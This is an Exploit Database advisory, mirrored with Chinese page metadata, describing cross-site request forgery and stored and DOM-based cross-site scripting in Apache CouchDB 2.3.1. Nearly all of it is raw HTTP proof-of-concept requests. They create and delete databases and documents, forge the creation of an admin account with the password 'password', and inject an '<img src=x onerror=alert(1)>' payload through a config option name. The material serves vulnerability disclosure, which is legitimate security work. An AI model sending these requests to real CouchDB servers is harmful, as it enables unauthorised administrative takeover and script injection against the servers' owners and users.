Apache CouchDB 2.3.1 – Cross-Site Request Forgery / Cross-Site Scripting

• Exploit Database
• 14 阅读

• 作者： Ozer Goker
  日期： 2019-03-25
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/46595/

• ##################################################################################################################################
  # Exploit Title: Apache CouchDB 2.3.1 | Cross-Site Request Forgery /
  Cross-Site Scripting
  # Date: 22.03.2019
  # Exploit Author: Ozer Goker
  # Vendor Homepage: http://couchdb.apache.org
  # Software Link: http://couchdb.apache.org/#download
  # Version: 2.3.1
  ##################################################################################################################################
  
  Introduction
  
  A CouchDB server hosts named databases, which store documents. Each
  document is uniquely named in the database, and CouchDB provides a RESTful
  HTTP API for reading and updating (add, edit, delete) database documents.
  
  #################################################################################
  
  Vulnerabilities: CSRF | XSS DOM Based & Reflected & Stored
  
  #################################################################################
  
  CSRF1
  
  Create Database
  
  PUT /test HTTP/1.1
  Host: 127.0.0.1:5984
  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
  Gecko/20100101 Firefox/65.0
  Accept: application/json, text/javascript, */*; q=0.01
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://127.0.0.1:5984/_utils/
  Content-Type: application/json
  X-Requested-With: XMLHttpRequest
  Content-Length: 27
  DNT: 1
  Connection: close
  Cookie: _ga=GA1.1.781615969.1550605249
  
  {"id":"test","name":"test"}
  
  #################################################################################
  
  CSRF2
  
  Delete Database
  
  DELETE /test HTTP/1.1
  Host: 127.0.0.1:5984
  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
  Gecko/20100101 Firefox/65.0
  Accept: application/json
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://127.0.0.1:5984/_utils/
  content-type: application/json
  pragma: no-cache
  Origin: http://127.0.0.1:5984
  DNT: 1
  Connection: close
  Cookie: _ga=GA1.1.781615969.1550605249
  Cache-Control: max-age=0
  
  
  #################################################################################
  
  CSRF3
  
  Create Document
  
  POST /test/ HTTP/1.1
  Host: 127.0.0.1:5984
  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
  Gecko/20100101 Firefox/65.0
  Accept: application/json, text/javascript, */*; q=0.01
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://127.0.0.1:5984/_utils/
  Content-Type: application/json
  X-Requested-With: XMLHttpRequest
  Content-Length: 18
  DNT: 1
  Connection: close
  Cookie: _ga=GA1.1.781615969.1550605249
  
  {"testdoc":"test"}
  
  #################################################################################
  
  CSRF4
  
  Create Admin
  
  PUT /_node/couchdb@localhost/_config/admins/admin HTTP/1.1
  Host: 127.0.0.1:5984
  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
  Gecko/20100101 Firefox/65.0
  Accept: application/json
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://127.0.0.1:5984/_utils/
  content-type: application/json
  pragma: no-cache
  Origin: http://127.0.0.1:5984
  Content-Length: 10
  DNT: 1
  Connection: close
  Cookie: _ga=GA1.1.781615969.1550605249
  Cache-Control: max-age=0
  
  "password"
  
  
  #################################################################################
  
  
  CSRF5 & XSS1 | DOM Based & Stored - Add Option
  
  
  PUT /_node/couchdb@localhost/_config/test/%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
  HTTP/1.1
  Host: 127.0.0.1:5984
  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
  Gecko/20100101 Firefox/65.0
  Accept: application/json
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://127.0.0.1:5984/_utils/
  content-type: application/json
  pragma: no-cache
  Origin: http://127.0.0.1:5984
  Content-Length: 6
  DNT: 1
  Connection: close
  Cookie: _ga=GA1.1.781615969.1550605249
  Cache-Control: max-age=0
  
  "test"
  
  #################################################################################
  
  CSRF6 & XSS2 | DOM Based & Stored - Delete Option
  
  DELETE /_node/couchdb@localhost/_config/test/%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
  HTTP/1.1
  Host: 127.0.0.1:5984
  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
  Gecko/20100101 Firefox/65.0
  Accept: application/json
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://127.0.0.1:5984/_utils/
  content-type: application/json
  pragma: no-cache
  Origin: http://127.0.0.1:5984
  DNT: 1
  Connection: close
  Cookie: _ga=GA1.1.781615969.1550605249
  Cache-Control: max-age=0
  
  
  #################################################################################